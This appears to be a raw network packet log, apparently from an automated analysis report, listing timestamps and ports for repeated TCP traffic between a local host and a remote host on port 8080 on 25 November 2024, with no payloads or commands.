                                                                                                                                                        Nov 25, 2024 11:10:22.023277998 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.023320913 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.024044991 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.024169922 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.024220943 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.025012970 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.025084972 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.025131941 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.025814056 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.025938988 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.025976896 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.026721001 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.026834965 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.026880980 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.027599096 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.027698994 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.027740955 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.028469086 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.028573036 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.028616905 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.029371977 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.029498100 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.029547930 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.030277014 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.030350924 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.030395985 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.031158924 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.031276941 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.031328917 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.032042027 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.032151937 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.032198906 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.032891989 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.033023119 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.033076048 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.033791065 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.033924103 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.033971071 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.034661055 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.034750938 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.034794092 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.035603046 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.035690069 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.035737038 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.036467075 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.036571026 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.036618948 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.037312031 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.037440062 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.037489891 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.038259983 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.038458109 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.038515091 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.039160967 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.039259911 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.039321899 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.039985895 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.088987112 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.143676996 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.143718004 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.143790960 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.144104958 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.144128084 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.144170046 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.145059109 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.145144939 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.145186901 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.145951986 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.146049023 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.146091938 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.146738052 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.146943092 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.147000074 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.147499084 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.147613049 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.147656918 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.148375034 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.148389101 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.148428917 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.176034927 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.176170111 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.176227093 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.176513910 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.176569939 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.176615953 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.177341938 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.177568913 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.177612066 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.178226948 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.178508997 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.178551912 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.179124117 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.179272890 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.179323912 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.179979086 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.180111885 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.180156946 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.180972099 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.181041956 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.181083918 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.181814909 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.181829929 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.181864977 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.182718992 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.182782888 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.182823896 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.183562994 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.183613062 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.183657885 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.200887918 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.201013088 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.201078892 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.201124907 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.201364040 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.201419115 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.202215910 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.202400923 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.202455044 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.203027010 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.203090906 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.203136921 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.203784943 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.203993082 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.204041958 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.204672098 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.204741001 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.204790115 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.205569983 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.205658913 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.205708027 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.206433058 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.206559896 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.206604958 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.207345963 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.207473040 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.207520962 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.208298922 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.208332062 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.208379030 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.209137917 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.209151030 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.209213018 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.209995985 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.210251093 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.210302114 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.210849047 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.210963964 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.211009979 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.211739063 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.211905956 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.211951017 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.212766886 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.212836981 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.212883949 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.213507891 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.213666916 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.213716984 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.214453936 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.214510918 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.214557886 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.215348005 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.215449095 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.215497017 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.216217041 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.216320038 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.216365099 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.217199087 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.217339039 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.217384100 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.217978001 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.218100071 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.218153954 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.219162941 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.219293118 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.219336987 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.220174074 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.220186949 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.220232964 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.220978975 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.221236944 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.221282959 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.221882105 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.221932888 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.221975088 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.222520113 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.222672939 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.222718000 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.223346949 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.223514080 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.223560095 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.224229097 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.224253893 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.224298954 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.225086927 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.225136042 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.225179911 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.225914001 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.226041079 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.226083040 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.226805925 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.226887941 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.226932049 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.227679014 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.227791071 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.227834940 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.228611946 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.228791952 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.228837013 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.229520082 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.229577065 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.229623079 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.230381966 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.230536938 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.230586052 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.231355906 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.231615067 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.231659889 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.232686043 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.276493073 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.335536957 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.335738897 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.335819960 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.335973978 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.336102009 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.336146116 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.337017059 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.337225914 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.337272882 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.337277889 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.338110924 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.338156939 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.338176012 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.339001894 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.339045048 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.339176893 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.339863062 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.339914083 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.339962006 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.340867043 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.340928078 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.368081093 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.368108988 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.368257999 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.368273020 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.368417025 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.368458033 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.369190931 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.369287014 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.369340897 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.370069981 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.370183945 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.370249033 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.370982885 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.371104002 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.371160030 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.371860027 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.372024059 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.372067928 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.372915030 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.373091936 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.373146057 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.374061108 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.374157906 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.374207020 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.374546051 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.374759912 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.374806881 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.375391960 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.375504017 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.375556946 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.376252890 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.392769098 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.392791986 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.392934084 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.392957926 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.393023968 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.393028021 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.393891096 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.393944979 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.393995047 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.394718885 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.394768000 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.394797087 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.395586014 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.395639896 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.395818949 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.396619081 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.396655083 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.396675110 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.397363901 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.397414923 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.397458076 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.398296118 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.398344040 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.398405075 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.399151087 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.399198055 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.399203062 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.400017023 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.400067091 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:22.400105000 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:22.400934935 CET80804970543.199.41.35192.168.2.5
